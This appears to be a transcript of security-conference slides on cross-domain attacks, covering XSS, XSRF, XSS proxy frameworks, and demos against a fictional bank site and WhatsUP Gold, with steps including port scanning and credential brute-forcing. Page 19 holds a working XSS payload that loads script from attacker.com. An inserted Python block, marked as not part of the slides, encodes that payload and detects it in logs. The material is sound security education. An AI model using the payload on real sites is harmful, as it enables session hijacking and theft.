Kicking Down the Cross Domain Door: Techniques for Cross Domain Exploitation
Billy K Rios (BK) and Raghav Dube

Oct 11, 2020

Transcript

Page 1

Kicking Down the Cross Domain Door: Techniques for Cross Domain Exploitation

Billy K Rios (BK) and Raghav Dube

Page 2

Implication of Cross Domain Attacks

Rich Content

Cookies

Mash-ups

Tabbed Browsing

Ajax

JSON

Page 3

Implication of Cross Domain Attacks

Page 4

Attack Foundations

Cross Site Scripting (XSS)

• Injected Client Code

• Cookie Stealing

• Browser Hijacking

• Web Page Defacement

• Hawtness

Page 5

Attack Foundations

XSS Example / Demo

Page 6

Attack Foundations

Cross Site Request Forgery (XSRF)

• Applications Trust

• Parameters, Cookie, IP Space…

• Authenticated Examples

• New Hawtness

Page 7

Attack Foundations

XSRF Example / Demo

Page 8

Attack Foundations

XSS meets XSRF

• Using XSS and XSRF together!

• XSSXSSRFSSX?

• Both Have Strengths

• Both Have Weaknesses

• One Armed Boxers

Page 9

XSS Proxies and Frameworks

XSS Proxy Fundamentals

• Anton Rager – XSS Proxy

• BeEf, XSS Shell, Backframe

• <script>alert('xss')</script>

• <script src = …/proxy.js>

• Dynamic JavaScript Payloads

• Frames and Control Channels

Page 10

XSS Proxies and Frameworks

XS-Sniper

• Typical XSS Proxy

• Rendering of HTML

• Organization of Data

• JavaScript Payloads Provided

• Source Code Snippets

Page 11

XSS Proxies and Frameworks

Dynamic JavaScript Payload for execute.js

Captured incoming HTTP requests to the XS-Sniper Proxy

Page 12

Dynamic JavaScript Payload for external.js

Page 13

XSS Proxies and Frameworks

Page 14

The Attack – The Initial XSS

MyPercent20.com

• Popular Social Networking/Blogging Site

• User Base of Tens of Thousands of Users

• Allows Uploading of HTML and Other Content

Page 15

The Attack – BigCreditUnion.com

BigCreditUnion.com

• Typical Online Banking Website

• Fictional Credit Union

• Built-in Vulnerabilities for Demo

Page 16

The Attack – BigCreditUnion.com

[Diagram labels: The Internet, BigCreditUnion, MyPercent20, Victim, Attacker]

Page 17

The Attack – BigCreditUnion.com

Assumptions

• The victim has access to the Internet

• BigCreditUnion.com has an XSS exposure

• The victim is using IE or Firefox

Page 18

The Attack – BigCreditUnion.com

Steps to Exploitation

• Target Reconnaissance

• Initial XSS

• Jumping to BigCreditUnion

• Authenticated Attacks

• Unauthenticated Attacks

Page 19

parent.myFrame3.location.href='http://www.bigcreditunion.com/login.asp?acctnum="></td><script%20src=http://www.attacker.com/test/external-spot.js?></script><td>';

http://www.attacker.com/test/external-spot.js?test123
http://www.attacker.com/test/noresponse.js?test123
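As an added example that is not part of the slides, and assuming the acctnum value is echoed into an input attribute inside a table cell, this Python shows the defensive side of the payload above: attribute-encoding that keeps the injected `"></td><script ...>` inert inside the attribute, and a log check that URL-decodes requests and flags any query parameter carrying a `<script src=>` to a host the site does not own. The log lines are constructed.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Constructed value modelled on the acctnum payload shown on this slide.
INJECTED_ACCTNUM = '"></td><script src=http://www.attacker.com/test/external-spot.js?></script><td>'

def render_acct_cell(acctnum: str) -> str:
    """Safe rendering (assumed context: the value is echoed into an input's
    value attribute inside a <td>). html.escape with quote=True encodes both
    quote styles, so the value can never close the attribute or the cell."""
    return '<td><input name="acctnum" value="%s"></td>' % html.escape(acctnum, quote=True)

def is_neutralized(rendered: str) -> bool:
    """The rendered cell keeps exactly one opening <td> and no live <script>."""
    return rendered.count("<td>") == 1 and "<script" not in rendered

# <script ... src=http://HOST/...  (attribute quotes optional, case-insensitive)
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]?https?://([^/'\"\s>]+)", re.I)

def flag_request(log_line: str, own_hosts: set) -> list:
    """Return (param, host) pairs for every query parameter that injects a
    <script src=...> pointing at a host we do not own. Expects a common-log
    style line with the request path in double quotes; parse_qs undoes the
    %22/%3C/%20 encoding seen in the logged request."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP', log_line)
    if not m:
        return []
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    hits = []
    for name, values in params.items():
        for value in values:
            found = SCRIPT_SRC.search(value)
            if found and found.group(1).lower() not in own_hosts:
                hits.append((name, found.group(1).lower()))
    return hits

# Constructed log lines: the first carries the slide's payload, the second is benign.
SAMPLE_LOGS = [
    '10.0.0.5 - - [11/Oct/2020:10:00:00 +0000] "GET /login.asp?acctnum=%22%3E%3C/td%3E'
    '%3Cscript%20src=http://www.attacker.com/test/external-spot.js?%3E%3C/script%3E%3Ctd%3E HTTP/1.1" 200 512',
    '10.0.0.6 - - [11/Oct/2020:10:00:01 +0000] "GET /login.asp?acctnum=123456 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print(render_acct_cell(INJECTED_ACCTNUM))
    for line in SAMPLE_LOGS:
        print(flag_request(line, {"www.bigcreditunion.com"}))
```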

Page 20

The Attack – BigCreditUnion.com

DEMO

Page 21

The Attack – WhatsUP Gold 2006

WhatsUP Gold 2006

• Made by Ipswitch

• Has Known XSS Vulnerabilities

• Found on Corporate Intranets

• Not Limited to WhatsUP Gold

• “Protected by Firewalls!”

Page 22

The Attack – WhatsUP Gold 2006

Page 23

The Attack – WhatsUP Gold 2006

Page 24

The Attack – WhatsUP Gold 2006

[Diagram labels: The Internet, MyPercent20, Victim, Attacker, WhatsUPGold]

Page 25

The Attack – WhatsUP Gold 2006

Assumptions

• The management console is only available via the Intranet

• The victim will NOT be logged into the management console

• The victim does NOT have a WhatsUP account

• The victim is using Firefox (Possible with IE)

• No unauthenticated XSS vulnerabilities

Page 26

The Attack – WhatsUP Gold 2006

Steps to Exploitation

• Vulnerability Research

• Target Reconnaissance

• Initial XSS

• Port scanning and Fingerprinting

• Brute Forcing Credentials

• XSS follow-up

• Driving Interaction

Page 27

The Attack – WhatsUP Gold 2006

Creds List

Page 28

The Attack – WhatsUP Gold 2006

NOT LIMITED TO WhatsUP Gold!

Page 29

The Attack – WhatsUP Gold 2006

DEMO

Page 30

WTF?

One More Time… This time in Slow motion

Page 31

Questions and Thanks…

PEOPLE I’ve MET

Danya

Nitesh Dhanjani

Rajat Swarup

Sriram

Mike Crabtree

Old PAC-CERT Crew

Ed Souza

PEOPLE I haven’t MET

Jeremiah Grossman

RSnake

Anton Rager

SPIDynamics

Black Hat

Houston & New York Advanced Security Centers!